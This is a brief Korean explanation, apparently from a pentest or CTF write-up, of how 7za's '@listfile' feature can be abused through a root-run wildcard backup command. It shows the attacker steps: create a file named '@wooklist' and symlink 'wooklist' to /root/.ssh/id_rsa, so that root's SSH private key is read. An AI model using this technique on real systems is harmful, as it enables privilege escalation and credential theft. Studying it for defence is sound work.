# 7za의 특별한 기능: `@listfile` - `7za`는 인자에 `@something`이 있으면 그걸 "파일 목록 파일"이라고 생각한다. - 즉, `@something` -> `something` 파일을 열어서 그 안에 있는 줄들을 파일 이름으로 해석함. 만약 `root`유저가 아래와 같은 명령어를 실행한다고 하자 ```bash /usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- * ``` # 공격자 `@`로 시작하는 파일 하나 생성 ```bash touch @wooklist ``` 민감한 파일을 `wooklist`로 심볼릭 링크 ```bash ln -s /root/.ssh/id_rsa wooklist ``` `root` 유저가 `7za` 실행하면 `*` 와일드카드 때문에 `@wooklist` 와 `wooklist` 둘 다 인자로 들어감. `@wooklist` 때문에 `7za`는 `wooklist` (=`/root/.ssh/id_rsa`)의 내용을 파일 이름 목록으로 읽으려고 함.